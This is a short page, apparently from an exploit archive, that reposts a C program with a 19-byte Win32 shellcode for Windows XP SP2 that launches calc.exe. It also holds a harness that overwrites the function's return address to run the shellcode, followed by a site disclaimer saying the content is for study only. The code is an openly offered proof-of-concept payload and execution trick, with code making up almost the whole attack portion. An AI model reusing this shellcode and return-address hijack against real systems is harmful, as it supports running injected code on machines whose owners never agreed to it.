view source print? /* Author: SkuLL-HacKeR Big Thx To : my brothers : Pr0F.SELLiM - ThE X-HaCkEr - Jiko - My friends in Morocco H0ME : Geeksec.com & No-exploiT Email : My@Hotmail.iT & Wizard-skh@hotmail.com // Win32 Shellcode Collection (calc) 19 bytes // Shellcode Exec Calc.exe // Tested on XP SP2 FR #include "stdio.h" unsigned char shellcode[] = "\xeB\x02\xBA\xC7\x93" "\xBF\x77\xFF\xD2\xCC" "\xE8\xF3\xFF\xFF\xFF" "\x63\x61\x6C\x63"; int main () { int *ret; ret=(int *)&ret+2; printf("Shellcode Length is : %d\n",strlen(shellcode)); (*ret)=(int)shellcode; return 0; }
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论